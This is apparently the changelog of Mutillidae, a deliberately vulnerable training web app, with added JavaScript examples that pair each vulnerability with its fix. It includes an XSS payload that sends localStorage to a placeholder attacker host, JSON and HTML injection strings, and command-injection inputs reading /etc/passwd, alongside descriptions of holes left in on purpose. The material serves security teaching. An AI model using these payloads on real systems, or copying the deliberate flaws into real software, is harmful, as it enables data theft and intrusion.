Mutillidae: Born to be Hacked
Version: 2.1.19

Developed by Adrian "Irongeek" Crenshaw and Jeremy Druin

05/13/2012: Jeremy Druin

Change Log for Mutillidae 2.1.19:

  • Fixed broken link to https://addons.mozilla.org/en-US/firefox/collections/jdruin/pro-web-developer-qa-pack/ (Mozilla Add Ons) on the "Resources" sub-menu.
  • Added "validation" to the HTML 5 storage page for the "key" field. The validation checks for any non-alphanumeric characters and prints an error if any are found. The error message echoes the rejected key, and because the page does not output-encode the message before writing it into the page, the key field can be used for DOM injection (DOM-based XSS).
  • Added a large number of HTML 5 based exploits to the Mutillidae-Test-Scripts.txt file. Approximately 100 lines of new demonstration code have been added.
  • On the setup or reset database page, if no errors were detected, the page now sends the user back to the page that requested the database be reset. A popup box gives the user the option to stay on the page.
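The key-field entry above is a good illustration of how a validation routine becomes a sink. The following is an added example, not Mutillidae's own code: it models the "alphanumeric only" check (the exact pattern is an assumption), builds the error message the way a page that writes with innerHTML or document.write would, and contrasts it with the same message output-encoded. The page is represented as an HTML string so it runs under Node without a browser; the capture host in the payload is a placeholder.

```javascript
// Added example, not Mutillidae's own code. Models the 2.1.19 "key" validation
// on the HTML5 storage page and shows why echoing the rejected key without
// output encoding creates a DOM injection sink. The page is represented as an
// HTML string so the script runs under Node without a browser.

const KEY_PATTERN = /^[A-Za-z0-9]+$/;   // assumed meaning of "alphanumeric only"

// Encode the characters that change meaning in an HTML text or attribute context.
function encodeForHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the rejected key is concatenated straight into markup that the
// page then writes with innerHTML (or document.write). Storage is protected,
// but the error message itself is the injection point.
function vulnerableErrorHtml(key) {
  if (KEY_PATTERN.test(key)) return null;   // accepted, nothing to report
  return '<div class="error">Key "' + key + '" contains non-alphanumeric characters</div>';
}

// Hardened: identical validation, but the echoed key is encoded before it
// reaches the DOM, so the browser shows the payload instead of parsing it.
function safeErrorHtml(key) {
  if (KEY_PATTERN.test(key)) return null;
  return '<div class="error">Key "' + encodeForHtml(key) + '" contains non-alphanumeric characters</div>';
}

// Constructed payload. The onerror handler fires as soon as the <img> is parsed,
// reads every localStorage entry (the home page plants one on each visit) and
// sends it to the capture page, which records any GET parameter it is given.
// The host name is a placeholder, not a real server.
const PAYLOAD =
  '<img src=x onerror="(new Image).src=' +
  "'http://attacker.example/mutillidae/capture.php?d='" +
  '+encodeURIComponent(JSON.stringify(localStorage))">';

// Crude sink detector for a test harness: an unencoded tag carrying an
// event-handler attribute, or a script tag, means the markup is live.
function containsActiveMarkup(html) {
  return /<\w+[^>]*\bon\w+\s*=/i.test(html) || /<script\b/i.test(html);
}

// Example run, mirroring what the page would show for a normal and a hostile key.
console.log(vulnerableErrorHtml('sessionToken'));   // null: valid key, no message
console.log(vulnerableErrorHtml(PAYLOAD));          // raw <img ...> lands in the DOM
console.log(safeErrorHtml(PAYLOAD));                // &lt;img ...&gt; shown as text
```

The validation is not wrong in itself; the defect is that a rejected value is reflected into an HTML context without encoding for that context. Validation and output encoding are separate controls, and the second one is the one the page skips.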

03/15/2012: Jeremy Druin

Change Log for Mutillidae 2.1.18:

  • The setup database page now clears HTML 5 Local and Session Storage.
  • Fixed alignment issues with icons on the captured-data page.
  • Partially protected the capture-data.php page so that it can safely capture values that contain SQL injection. Other fields are left unprotected so users can practice sending SQL injection.
  • Added a timestamp to records captured in the captured-data.txt text file.
  • Added a script to the home page that adds a value to HTML 5 storage when a user visits the site. This gives users a web storage target to go after even if they don't visit the HTML 5 storage page.
  • Converted log-visit.php from using the hitlog table to using the LogHandler class. This helps consolidate the logging code into a single point of failure. All the code has been removed from log-visit.php except a call to the LogHandler.
  • Adjusted top horizontal menu padding to move buttons closer together
  • Added two new buttons to the top horizontal menu to allow user to get to the view log page and the view captured data page easier.
  • Removed the gethostbyaddr() function from the LogHandler to prevent the long timeouts associated with the function when the DNS server is not available. If PHP changes so that the function has a timeout setting it will be brought back.
  • Changed delete icon from jpeg to a transparent PNG so the icon can be put inline to the table headers to save space.
  • Added delete log button to the show log page.
  • Rearranged the buttons on the show logs page, added new icons, and cleaned up the code
  • Added new information output about the number of records found to the view logs page
  • Made the buttons on the captured data page smaller to free up some space.

03/08/2012: Jeremy Druin

Change Log for Mutillidae 2.1.17:

  • Added new menu items for DOM injection and Cookie injection.
  • Added a delete captured data button to the captured data page
  • Added new sub-menus to the cross site scripting menu for persistent and reflected cross site scripting. The pages to which the links point are existing pages but the new menus will help new users locate targets for these types of cross site scripting.
  • Added large number of proven scripts to the Mutillidae-Test-Scripts.txt file
  • Added link on View Blog Entries back to Add to Your Blog
  • Added link on Add Blog Entries back to View Blogs
  • Fixed typo on HTML 5 storage page
  • Added delete buttons to the HTML 5 web storage page to help testing

03/01/2012: Jeremy Druin

Change Log for Mutillidae 2.1.16:

  • Additional hints added to HTML5 Web Storage page to overwrite current web storage
  • Additional hints added to HTML5 Web Storage page concerning reading current web storage. Added code examples for document.write and using Firebug command line.
  • Added several new items to the Easter Egg file Mutillidae-Test-Scripts.txt
  • New vulnerability added. The HTML5 Storage page now has cross site scripting via DOM injection. The "storage key" field is vulnerable.
  • Added hints about DOM injection to the HTML5 Storage page.
  • Added hints to the capture-data.php page about cross site scripting
  • Updated the vulnerabilities listing

02/11/2012: Jeremy Druin

Change Log for Mutillidae 2.1.15:

  • Upgraded the "JavaScript Validation" for the dns-lookup.php page. The JavaScript validation is only activated in security level 1. The new validation checks for cross-site scripting characters in addition to OS command injection characters. The validations are trivial to defeat by disabling JS in the browser or using an interception proxy to bypass the validation.
  • In security level 1, on page add-to-your-blog.php the CSRF token is now generated. The token is predictable although perhaps not obvious. The intention is for students to use Burp-Suite sequencer to discover the pattern and inject the next token in the sequence (or to subtract each token from the last token).
  • The CSRF token generator for the add-to-your-blog.php page now uses the OWASP ESAPI Randomizer to generate random tokens in security level 5. The previous generator used mt_rand(), which is not a cryptographic random source. The new tokens have an entropy of around 132 bits.

01/30/2012: Jeremy Druin

Change Log for Mutillidae 2.1.14:

  • Made menu smaller width. Menu is 10% of screen now. This should help when using mutillidae on a classroom projector showing at 1024 x 768.
  • Made Banner 2.5% less tall. Gotta make some room people.
  • Fixed formatting bug in dns-lookup.php that made hints look funny
  • Added lots of new advanced examples to the Easter Egg file called Mutillidae-Test-Scripts.txt. The file is located in the documentation folder.
  • Password Generator (password-generator.php): Fixed bug by removing brackets from possible characters that will be used to make password.
  • Added new field to accounts: Boolean is_admin.
  • Added concept of administrative users and regular users
  • Added new vulnerability. There are secret pages that can be brute forced using a brute forcing tool like DirBuster or Burp-Intruder. Using Burp-Intruder try cycling through the "page" parameter with common names for secret pages. For example, try secret.php.
  • Fixed typo on page not found page
  • Created authorization required page
  • Added "Secret" Administrative Pages to menu under A8 - Failure to Restrict URL Access
  • Made menu item for Robots.txt more obvious
  • Fixed typo in vulnerabilities documentation
  • "Logged in user" now says "logged in admin" if the logged in user is an admin
  • Updated accounts created as targets
  • Improved output formatting on phpinfo.php page
  • Altered phpinfo.php so that admins can see page in any level but regular users can only see page in security levels 0 and 1.

01/10/2012: Jeremy Druin

Change Log for Mutillidae 2.1.13:

  • Added Mutillidae YouTube channel link to menu
  • Fixed some menu links so they open in new window
  • Added a hint to the framer.php page telling the user to try to change the security level.
  • Added a new page called anti-framing-protection.inc. The page shows developers how to implement old-style JavaScript frame-busting code. This isn't needed for new browsers because X-Frame-Options has supplanted frame-busting code, but there are still many old browsers running in kiosks and such.
  • Added more documentation in the Easter Egg file Mutillidae test scripts
  • Added Kevin Johnson as honorary default user
  • Added more values to default database to make SQL injection more interesting
  • Reduced the size of the header thickness to make more room
  • Greatly improved SQL Injection tutorial or at least typed a lot more stuff
  • Upgraded the Easter Egg file with more tips and tricks; mainly on SQL injection

01/09/2012: Jeremy Druin

Change Log for Mutillidae 2.1.12:

  • Changed sort order for captured-data.php to descending by date so last capture floats to top
  • Added a refresh button to the captured-data.php page
  • Added all the latest pen-testing scripts to the easter egg file Mutillidae-Test-Scripts.txt
  • Improved the hints on the HTML5 Storage page
  • Oops. Fixed bug in HTML5 storage PHP page.
  • Upgraded code in process-login-attempt.php pointed out by Josep Duran
  • Fixed a bug on add-to-your-blog.php in the CSRF code which would not allow a new blog to be saved. Bug found by Josep Duran.
  • Made the table output on add-to-your-blog.php look nicer.
  • Got rid of unneeded commented out code on set-background-color.php
  • Improved output readability on dns-lookup.php
  • Improved output readability on set-background-color.php

12/27/2011: Jeremy Druin

Change Log for Mutillidae 2.1.11:

  • Added more tools to pen-test-tool-lookup.php.
  • Added lots of HTML5 attacks to the easter egg file Mutillidae-Test-Scripts.txt
  • Added new page capture.php which captures any information sent to the page in GET or POST parameters and saves it to a database table. Can be used to capture cookies, session storage, local storage, or other data. The page is designed to reflect the capture cookie page used in the SANS 542 Web Application Pen Testing course currently taught by Kevin Johnson of SecureIdeas. It loops through the POST and GET parameters and records them to a file named captured-data.txt. On a Windows system, the file should be found at C:/xampp/htdocs/mutillidae/captured-data.txt. The page also tries to store the captured data in a database table named captured_data. There is another page named captured-data.php that attempts to list the contents of this table.
  • Added new page captured-data.php which displays data captured by page capture.php. In true Mutillidae fashion, this page is as vulnerable as all the others. Try hacking the hacker by sending SQL injections and XSS to the capture.php.
  • Changed includes for database configuration to require_once so that some pages can stand alone or work with index.php
  • Added a new table to the database called captured_data
  • Added better comments to index.php
  • Added data capture pages to menu under "Other"
  • Added detailed tutorials to the HTML5 storage page and the pen-test-tools.php page showing how to pen-test and exploit HTML5 storage and perform JSON injections. To see the new hints sections browse to the pages and click the hints button. The hints show at the bottom of the page. The HINTS button is on the menu at the top of the screen.

12/17/2011: Jeremy Druin

Change Log for Mutillidae 2.1.10:

  • Added menu item for the BACK buttons that are on all the pages. They are injectable to cause XSS. The menu item is located under OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Via HTTP Headers --> Those BACK Buttons. Any page will do. I just picked one at random.
  • Corrected some errors in the HTML5 storage hints. You have to enable HINTS level 1 to see the hints. The HINTS button is on the menu at the top of the screen.
  • Renamed setupreset.php to set-up-database.php
  • Fixed a nasty bug in view someones blog where the dropdown was missing names of bloggers
  • Fixed a minor formatting bug in html5-storage.php
  • Adjusted the graphics on the home page
  • Added a new page pen-test-tool-lookup.php. This page is vulnerable to JSON injection. A large tutorial was added as well showing how to perform JavaScript XSS injection into the JSON data so that the XSS executes. To see the tutorial, click the HINTS button. As an exercise, the user is encouraged to perform a JSON string injection and an HTML injection after learning how to perform the XSS injection. The JSON has been carefully designed to make it relatively easy to get the JSON injection to work. JSON injection can be somewhat tricky if a user has not tried it before and/or does not use JSON in web applications. The HINTS button is on the menu at the top of the screen. The page is also vulnerable to SQL injection, HTML injection, and JSON string injection in addition to XSS.
  • The next step will be to add defenses to pen-test-tool-lookup.php. There will be a level 1 defense and a level 5 defense. The level 1 will just be JavaScript validation. Level 5 defense will be more robust and hopefully difficult to defeat. This will be release 2.1.11 or later.
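The pen-test-tool-lookup entry above names JSON injection, JSON string injection and XSS as separate problems on one page. The following is an added example, not Mutillidae's code, that models both halves of such a lookup: a server that splices the user's tool name into a JSON literal by hand versus one that serialises properly, and a client that inserts the decoded field as HTML versus as text. The TOOLS table is a constructed stand-in for the database rows.

```javascript
// Added example, not Mutillidae's code. pen-test-tool-lookup.php is described as
// returning JSON about a tool which the client then writes into the page, and as
// vulnerable to JSON injection, string injection and XSS. This models both
// halves: a server that splices the user's tool name into a JSON literal by hand
// versus one that serialises properly, and a client that inserts the decoded
// field as HTML versus as text. TOOLS is a constructed stand-in for the database.

const TOOLS = { nmap: 'Port scanner', nikto: 'Web server scanner' };

// Vulnerable: string concatenation. A double quote in the name ends the JSON
// string early, so the caller can add keys or break the document.
function lookupJsonVulnerable(name) {
  const desc = TOOLS[name] || 'Unknown tool';
  return '{"tool":"' + name + '","description":"' + desc + '"}';
}

// Hardened: the serialiser escapes quotes, backslashes and control characters,
// so the name stays a single string value whatever it contains.
function lookupJsonSafe(name) {
  const desc = TOOLS[name] || 'Unknown tool';
  return JSON.stringify({ tool: name, description: desc });
}

function encodeForHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Client side, modelled on a string. Even with correct JSON, inserting the
// decoded field with innerHTML is the XSS; treating it as text is the fix.
function renderResultHtml(json, { asText }) {
  let data;
  try {
    data = JSON.parse(json);
  } catch (e) {
    return '<p class="error">lookup returned malformed JSON</p>';
  }
  const tool = asText ? encodeForHtml(data.tool) : data.tool;
  const description = asText ? encodeForHtml(data.description) : data.description;
  return `<p>Tool: ${tool}</p><p>${description}</p>`;
}

// Constructed payloads.
const STRUCTURE_INJECTION = 'x","isAdmin":true,"z":"';      // adds a key to the object
const SCRIPT_INJECTION = '<img src=x onerror=alert(1)>';    // XSS once inserted as HTML

console.log(lookupJsonVulnerable(STRUCTURE_INJECTION));
console.log(lookupJsonSafe(STRUCTURE_INJECTION));
console.log(renderResultHtml(lookupJsonSafe(SCRIPT_INJECTION), { asText: true }));
```

The two fixes are independent: JSON.stringify stops the name from changing the structure of the document, and text-context encoding on the client stops a name that is legitimately a string from being parsed as markup. A page needs both; the hand-built JSON is what makes the string injection and the "JSON injection" on the page possible, and the innerHTML-style insertion is what turns a harmless-looking string into XSS.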

12/16/2011: Jeremy Druin

Change Log for Mutillidae 2.1.9:

  • Added a large cross site request forgery tutorial. To access the tutorial, the HINTS have to be on level 2.
  • Added better formatting to the Cross Site Scripting Tutorial
  • Updated the menu to point the user to two pages which are vulnerable to CSRF

12/15/2011: Jeremy Druin

Change Log for Mutillidae 2.1.8:

  • Bug fix: The links on the front home page were absolute instead of relative. This was not an issue in XAMPP installations but caused an issue when installed on Samurai because Samurai uses http://mutillidae as Mutillidae's URL while XAMPP just uses http://localhost. The links should have been relative anyway.

11/26/2011: Jeremy Druin

Change Log for Mutillidae 2.1.7:

  • Added a new page for HTML5 storage. The page is meant to show how to both use and attack HTML5 storage. The page supports Local and Session storage types. The user can attack the storage in two contexts. They can act as if they want to read the contents of their own browser's session storage to see if the developer put authorization tokens or other items into the storage. They can also try to use XSS to steal the session storage; in this use-case the user would be acting as if they wanted to read someone else's storage. A large number of hints have been added to the page. The page name is "html5-storage.php" and it can be accessed from the Cross Site Scripting menu and the Information Leakage menu. In security level zero, the page has no defenses. In level 1, the page uses trivial JavaScript validation. In security level 5, the page refuses to put the secrets in client side storage.

11/13/2011: Jeremy Druin / Kenny Kurtz

Change Log for Mutillidae 2.1.6:

  • Enhanced the .htaccess file to automatically disable magic quotes on systems which enable them by default (such as some OSX versions of PHP)
  • Fixed some bugs in the phpinfo.php file that made the page display weird.
  • Enhanced the hidden PHPINFO page so that it would work if the user browsed to http://localhost/mutillidae/index.php?page=phpinfo.php or to http://localhost/mutillidae/phpinfo.php. This example assumes Mutillidae is running on localhost.
  • Fixed a bug in index.php that kept the log-visit page from being included.
  • Fixed a bug in log-visit.php that kept the page from working.
  • Fixed installation instructions format for IE 8 not in compatibility mode.

11/10/2011: Jeremy Druin

Change Log for Mutillidae 2.1.5:

  • Added a vuln to the login sequence. Now a cookie is created containing the username. Students should try to XSS the cookie and see what happens. Also try an HTTP response splitting attack, because the cookie value is written into an HTTP response header.
  • Created new twitter feed to make Mutillidae announcements and other web vulnerability tweaks. @webpwnized
  • Fixed installation instructions format for IE 8 not in compatibility mode

10/14/2011: Jeremy Druin

Change Log for Mutillidae 2.1.4:

  • Moved usage instructions and php errors from the home page to their own pages.
  • In insecure mode, changed the method of the user-info.php page to GET in order to make it easier to use sqlmap against Mutillidae. sqlmap supports POST but it is easier to use with GET.
  • Added hints about sqlmap to sql injection tutorial and to the easter egg file
  • Added a credit card table as a target in the database
  • Confirmed that the view-blog table can be attacked with sqlmap. The answer is in the Easter Egg file.
  • Updated the SQL injection tutorial file

10/13/2011: Jeremy Druin

Change Log for Mutillidae 2.1.3:

  • Fixed a bug: if the user was on the home page without having clicked any link (such as when arriving via a bookmark) and then clicked "change security level", the page redirected to page not found.
  • Increased the slide time for the ddsmoothmenu to make it slow down a little bit
  • Added a NEW vulnerability. Many sites have crazy pages that show server settings, expose admin functionality, allow configuration, or other features a user should not be able to see. The problem is not the pages themselves so much as the fact that developers think no one will guess the name and browse to them. Shoulder surfing, guessing, brute-forcing, etc can be used to find these pages. Mutillidae now has such a page. It is in the "Server Misconfiguration" category. See secret-administrative-pages.php for hints.
  • Augmented the installation instructions
  • Added link to ihackcharities to front page

09/25/2011: Jeremy Druin

Change Log for Mutillidae 2.1.2:

  • Added a new security level. Now there is security level 1. The only difference in this release between level 0 and level 1 is that level 1 has JS validation. The JS validation had been in place for a while but was active in level 0. Since level 0 is supposed to be very easy, the decision was made to create level 1 and move JS validation to level 1. The JS validation is trivial to bypass: simply disable JS or use a proxy such as Tamper Data, Paros, Burp, WebScarab, or others.
  • Page homenotes.php has been merged with home.php.
  • Page home.html has been renamed home.php
  • Added protection for SQL injection to the add-to-your-blog.php output of the current user's blog entries. Prior to this patch, you could SQL inject in security level 5 by putting your injection in the current user's login name, because the query uses the current user's login name as its input.
  • Improved the DNS lookup page to add JS validation in security level 1 mode.
  • Changed padding for BACK button to use styles rather than HTML BR tags.
  • Changed the password generator password length to 15 to set a better example.
  • Some refactoring on user-info.php and login.php to clean up code

09/16/2011: Jeremy Druin

Change Log for Mutillidae 2.1.1:

  • Added CSRF Protection to page add to your blog. This only works in secure mode.
  • Added more scripts to the easter egg file (Mutillidae Test Scripts)
  • Bug fix: The setupandreset.php errors were not printing out.
  • Stupid bug fix: Removed the "open DB" that was firing before the database was actually created.
  • Created output on page setupandreset.php to show what happened
  • Added try/catch and more error handling to setupandreset.php

08/31/2011: Jeremy Druin

Change Log for Mutillidae 2.1.0:

  • Fixed error on page add to your blog. User input was not escaped or encoded in secure mode.
  • Major change. The MySQL connection has been changed from the procedural mysql_ functions to object oriented instances of the class mysqli. mysqli has been available since PHP 5.0 but is brand new to Mutillidae. There is a high chance of error. Please let me know if there are bugs found. This new class gives us many new abilities, including the ability to call stored procedures without using concatenation. This change affects the entire project and changes the capabilities of the project, which is why the minor version was updated. All of the database code has been ripped out and replaced from the ground up. Next will be to add stored procedures and views to the database. When SQL injection is done on metadata, there will be many more targets. Users will be able to steal the source code from views and procs during pen tests along with dumping tables.
  • Added row number to output on add to your blog
  • Added logging for successful and failed login attempts.
  • Fixed bug in closing bold tag tokenizer on add to your blog
  • Updated page arbitrary-file-inclusion.php. Now you can practice making arbitrary system files load. The fun never ends.
  • Added SQL injection defenses to closedb.inc. This may not make much sense unless you know that closedb.inc logs to the hitlog table. Part of what it logs is the User-Agent and Referer headers, which are controlled by the user.
  • Created new page log-visit.php which logs each request to the server. This page could be used to poison the log with XSS or to SQL inject the database.
  • Fixed bug on dns-lookup.php that allowed the log to be injected even in secure mode.
  • Added new page vulnerabilities.php that documents the vulnerabilities on each page to help users know what to try
  • Renamed home.htm to home.html for compliance with convention
  • Reconfigured index.php to open database as late as possible
  • Refactored opendb.inc to use standard error handling like rest of site. Page size is much smaller as a result
  • Added a new XSS vulnerability to page user-info.php. This can be exploited by inputting scripts into the username field.
  • Added row count output to the show-log.php page
  • Fixed back button so it doesn't span the entire width of the page
  • Added error output to page register.php. In insecure mode, the user can get a lot of information about the insert. In secure mode, we keep that to ourselves.

08/19/2011: Jeremy Druin

Change Log for Mutillidae 2.0.13:

  • Added a new page called password-generator that allows the user to practice HTML injection, cross site scripting, and JavaScript injection. The page is primarily intended to practice JS injection in as easy a way as possible.

07/24/2011: Jeremy Druin

Change Log for Mutillidae 2.0.12:

  • Changed the label of the link to "Cross Site Framing" to "Click-Jacking"
  • Created a new page to frame the Mutillidae site so we can practice Cross-Site Framing. Added a menu item under Other --> Information Leakage --> Cross-Site Framing. In secure mode, Mutillidae does not allow itself to be framed by third party sites. Enjoy.
  • Created a new menu path for "Missing HTTPOnly Attribute" because it doesn't really fit directly into a XSS exploit. It is a misconfiguration that leads to an exploit.
  • Created a new page to talk about the site footer displaying the user agent string. The new page includes hints.
  • Refactored footer.php to remove database closing code. This code is in index.php now.
  • Added new vulnerability for remote file inclusion. Access via "A4 - Insecure Direct Object References" --> "Arbitrary File Inclusion". Enjoy!

07/17/2011: Jeremy Druin

Change Log for Mutillidae 2.0.11:

  • Oops! Fixed a bug in the secure code which (ironically) did not stop the command injection as long as the attacker chained the attack with a validly formed IPV4 address. I forgot to put the starts-with and ends-with symbols on the RegEx.
  • Added IPV6 pattern as a valid pattern on page dns-lookup.php. The page will accept IPV6, IPV4, or Domain Name.
  • Made some cosmetic improvements to the dns-lookup.php page
  • Added a whole new batch of fun. Mutillidae now supports (and defends against) Cascading Style Injection. Enjoy.
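The first entry in this release, the missing start and end anchors on the dns-lookup RegEx, is a classic and worth seeing concretely. The following is an added example, not Mutillidae's code: it builds an unanchored and an anchored validator over the three input kinds the page accepts (IPv4, IPv6, domain name) and shows that the unanchored one accepts any string that merely contains a valid host. The IPv4, IPv6 and host-name patterns are this example's own simplified choices, not the project's.

```javascript
// Added example, not Mutillidae's code. It reproduces the class of bug fixed in
// 2.0.11: a dns-lookup validator whose regular expression has no start and end
// anchors only asks "does the input contain a valid host?", so a chained shell
// command riding behind a well-formed IPv4 address passes. The IPv4, IPv6 and
// host-name patterns are this example's own simplified choices, not the
// project's; in particular the IPv6 form rejects IPv4-mapped addresses and the
// host-name form requires the last label to be alphabetic.

const OCTET = '(?:25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])';
const IPV4 = `${OCTET}(?:\\.${OCTET}){3}`;
// Hex digits and colons only, at least one colon: no shell metacharacter can
// fit, which is the property that matters for command injection.
const IPV6 = '(?=[0-9A-Fa-f]*:)[0-9A-Fa-f:]{2,39}';
const LABEL = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
const HOSTNAME = `(?:${LABEL}\\.)*[A-Za-z]{2,63}`;

// The bug: alternation without ^ and $ matches anywhere in the input.
const UNANCHORED = new RegExp(`(?:${IPV4}|${IPV6}|${HOSTNAME})`);
// The fix: anchor both ends so the whole input must be exactly one host.
const ANCHORED = new RegExp(`^(?:${IPV4}|${IPV6}|${HOSTNAME})$`);

function isValidHostUnanchored(input) {
  return UNANCHORED.test(input);
}

function isValidHostAnchored(input) {
  return ANCHORED.test(input);
}

// Output-side hardening: even a correct validator should not be the only
// control. Build an argument vector for execFile-style invocation rather than
// a command line for a shell, so metacharacters never get interpreted.
function buildLookupArgv(host) {
  if (!isValidHostAnchored(host)) {
    throw new Error('rejected host: ' + JSON.stringify(host));
  }
  return ['nslookup', host];
}

// Constructed inputs: the injected ones are what the 2.0.11 note describes.
const SAMPLES = [
  '127.0.0.1',
  '2001:db8::1',
  'example.com',
  '127.0.0.1; cat /etc/passwd',
  'example.com && id',
];
for (const sample of SAMPLES) {
  console.log(JSON.stringify(sample), 'unanchored:', isValidHostUnanchored(sample), 'anchored:', isValidHostAnchored(sample));
}
```

One caveat specific to the PHP side of this project: in PCRE, `$` also matches just before a trailing newline, so `/^...$/` accepts "127.0.0.1\n; id" unless the `D` modifier is set or `\z` is used instead of `$`. JavaScript's `$` (without the `m` flag) matches only at the true end of the string, which is why the example can assert that input is rejected. Either way, passing the value as an argument vector rather than through a shell is the control that holds when the regex is wrong.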

07/09/2011: Jeremy Druin

Change Log for Mutillidae 2.0.10:

  • Added new vulnerability HTTP Parameter Pollution on page user-poll.php
  • Added defense for JavaScript injection in the "Back" buttons. In secure mode, Mutillidae will encode the HTTP Referer header using JavaScript encoding

06/21/2011: Jeremy Druin

Change Log for Mutillidae 2.0.9.1:

  • Added new menu items under SQLi for SQLi Insert Injection
  • Added new menu item for documentation
  • Moved constants into constants.php file
  • Patched tabbing in home.htm
  • Added additional instructions on suppressing PHP errors with XamppLite. Thanks to Miguel Wherner for the tip.
  • Added more hints to command injection page
  • Updated the Easter egg file
  • Added "Bookmark This Site" button to the resources tab in the menu
  • Added lots more default users
  • Added a stored procedure for users to attempt to extract the source code using SQL injection
  • Added a stored procedure to support logins so we can start to put real security into this thing.
  • Added new article "How to Access Mutillidae over Virtual Box Host Only Network"
  • Introduced a new vulnerability: JavaScript Injection

06/15/2011: Jeremy Druin

Change Log for Mutillidae 2.0.8:

  • Added more comments to the code to explain how defenses work
  • Added support for the <u></u> tag to the blog. In secure mode Mutillidae will allow this tag but still safely encode output and stop XSS.
  • Added JavaScript filtering to prevent single quotes from being entered in blog entries. This gives practice bypassing JavaScript "security" and helps the user understand that JavaScript cannot provide security.
  • Added lots of JS filtering to login.php. Nearly all characters are filtered. Users are encouraged to understand that client-side JavaScript filtering is useless for security.
  • Added autofocus to login.php and add-to-blog.php
  • Added more "allowed dangerous HTML tags" to the blog. Until now only the bold HTML tag was supported. Also the output was not HTML5 compliant. For example, if the user entered a bold tag, then a bold tag was output; however the bold tag is deprecated and styles must be used. So Mutillidae allows the user to input a bold tag but correctly encodes it as a style upon output. The italic tag is now also supported as a dangerous input which is safely output without fear of Cross Site Scripting. These defenses only operate in secure mode of course. In insecure mode, the site allows any input and simply outputs whatever is input without any encoding.
  • Changed menu for OWASP A1 - Injection to differentiate between SQL, HTML, and Command Injection. This should make it more clear which pages exhibit vulnerabilities with the specific injection sub-types. Also added a new link for Blind SQL Injection.
  • Changed menu for OWASP A2 - Cross Site Scripting to differentiate between XSS coming in via user supplied fields (GET/POST) and values within HTTP Request Headers.
  • Added tutorials feature.
  • Added SQL Injection tutorial
  • Added Cross Site Scripting tutorial
  • Added Command Injection tutorial
  • Added new feature. Hints can now be at different levels. Each time the user clicks Hints, the level increases by 1 until rolling over.
  • Removed the installation instructions from the home page. A new page for instructions is created and linked from the menu.
  • Augmented the installation instructions to include running from Samurai, creating a custom ISO, installing to XAMPP, and running in virtual machines.
  • Reformatted install instructions and main home page to be compliant with HTML 5
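The "allowed dangerous HTML tags" entry in this release describes a rule that is easy to get wrong: let the user type <b>, <i> and <u>, encode everything else, and still emit valid HTML5. The following is an added example, not Mutillidae's code, that implements that rule. The important design choice is order: encode first, then turn only the exact literal tag forms back into styled spans, so a tag carrying an attribute never matches and is shown as text.

```javascript
// Added example, not Mutillidae's code. Implements the blog rule the 2.0.8 notes
// describe: let the user type <b>, <i> and <u>, output everything else
// HTML-encoded, and render the allowed tags as styled spans so the page stays
// valid HTML5. The trick is order: encode first, then turn only the exact
// literal tag forms back into markup, so <b onmouseover=...> never matches and
// is shown as text. Tag matching is case-sensitive by design.

function encodeForHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Allowed "dangerous" tags and the style each becomes on output.
const ALLOWED = {
  b: 'font-weight:bold',
  i: 'font-style:italic',
  u: 'text-decoration:underline',
};

// A stray closing tag (or a missing one) would otherwise unbalance the page's
// own markup: drop closers with no opener and close anything left open.
function balanceSpans(html) {
  const tokenRe = /<span style="[^"]*">|<\/span>/g;
  let depth = 0;
  let out = '';
  let last = 0;
  let m;
  while ((m = tokenRe.exec(html)) !== null) {
    out += html.slice(last, m.index);
    if (m[0] === '</span>') {
      if (depth > 0) {
        depth -= 1;
        out += m[0];
      }
    } else {
      depth += 1;
      out += m[0];
    }
    last = tokenRe.lastIndex;
  }
  out += html.slice(last);
  return out + '</span>'.repeat(depth);
}

function renderBlogEntry(text, { secure }) {
  if (!secure) return text;    // insecure mode: raw output, as the changelog says
  let html = encodeForHtml(text);
  for (const [tag, style] of Object.entries(ALLOWED)) {
    html = html.split(`&lt;${tag}&gt;`).join(`<span style="${style}">`);
    html = html.split(`&lt;/${tag}&gt;`).join('</span>');
  }
  return balanceSpans(html);
}

// Constructed entries: legitimate formatting, a script, and an attribute smuggle.
const ENTRIES = [
  'Hello <b>world</b>, <i>nice</i> and <u>clean</u>',
  '<b>bold</b><script>alert(document.cookie)</script>',
  '<b onmouseover=alert(1)>hover me</b>',
];
for (const entry of ENTRIES) {
  console.log(renderBlogEntry(entry, { secure: true }));
}
```

Because the whitelist is applied to the already-encoded string, nothing the user types can produce a `<` in the output except the three exact literals that the code itself rewrites, and those are rewritten into a fixed span with a fixed style attribute. The balancing pass matters for the "business requirement" too: without it a single stray `</b>` from one blog entry would close an element belonging to the page.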

05/20/2011: Jeremy Druin

Change Log for Mutillidae 2.0.7:

  • Added a new page rene-magritte.php to explore click-jacking. In secure mode, Mutillidae sends the X-FRAME-OPTIONS: DENY header. In modern browsers, this causes the browser to refuse to render rene-magritte.php inside a frame rather than allowing the page to be framed.
  • Added a resources link to the main menu. Links are to information or tools that can help with testing Mutillidae.
  • Added new class LogHandler to take over logging. Previously, logging statements had to be copied to each spot where logging was needed. With the new class, logging requires only one line of code and the logger automatically logs based on the current security level. In insecure mode, no attempt to stop XSS or SQLi is made. With the new class, far fewer lines of code are needed and many more places log. With more places logging, there is a much better chance of finding a log exploit and taking advantage of it (insecure mode). Logging added to pages: add-to-your-blog, dns-lookup, text-file-viewer, source-viewer.php, register.php, redirectandlog.php, and user-info.php
  • Added more default users to initial setup to give more targets.

05/10/2011: Jeremy Druin

Change Log for Mutillidae 2.0.6:

  • Added a new security vulnerability and counteracting secure code. The "business requirements" for the add-new-blog-entry page now require users to be able to enter a bold tag in their blog. In secure mode, Mutillidae allows this functionality while still protecting users from malicious injected input.
  • A new secret page has been added. There are lots of test scripts that the developers used to hack Mutillidae inside. It will be very hard to guess the name of the file but there are plenty of vulns that will allow users to locate and open the file.

04/22/2011: Jeremy Druin

Change Log for Mutillidae 2.0.6:

